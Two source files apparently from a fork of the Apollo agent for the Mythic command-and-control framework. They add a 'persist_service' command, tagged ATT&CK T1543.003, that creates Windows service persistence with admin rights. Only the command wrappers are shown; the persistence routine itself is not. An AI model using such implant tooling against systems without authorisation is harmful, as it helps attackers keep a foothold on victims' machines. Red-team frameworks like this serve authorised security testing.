File: apollo/agent_functions/persist_service.py
from mythic_container import MythicCommandBase, MythicTask
from mythic_container import TaskArguments


class PersistServiceArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = []

    async def parse_arguments(self):
        pass


class PersistServiceCommand(MythicCommandBase):
    cmd = "persist_service"
    needs_admin = True
    help_cmd = "persist_service"
    description = "Establish persistence via Windows service (requires admin)"
    version = 1
    author = "@phantom"
    argument_class = PersistServiceArguments
    attackmapping = ["T1543.003"]

    async def create_go_tasking(self, taskData: MythicTask) -> str:
        return "PersistenceHandler.CreateServicePersistence()"

    async def process_response(self, task: MythicTask, response: any) -> str:
        return f"Service persistence: {response}"

File: Payload_Types/phantom_apollo/agent_code/Tasks/persist_service.cs
using System;
using PhantomInterop.Classes;
using PhantomInterop.Interfaces;
using PhantomInterop.Structs.PhantomStructs;
using Phantom.Management.Persistence;

namespace Tasks
{
    public class persist_service : ICommand
    {
        public string command { get; } = "persist_service";
        public string description { get; } = "Establish persistence via Windows service (requires admin)";
        public string help { get; } = "persist_service";
        public string version { get; } = "1.0.0.0";
        public string id { get; } = "persist_service";

        public PhantomTaskResponse CreateTasking(PhantomTaskMessage task)
        {
            try
            {
                return PersistenceHandler.CreateServicePersistence();
            }
            catch (Exception ex)
            {
                return new PhantomTaskResponse
                {
                    Completed = false,
                    UserOutput = $"Error creating service persistence: {ex.Message}"
                };
            }
        }
    }
}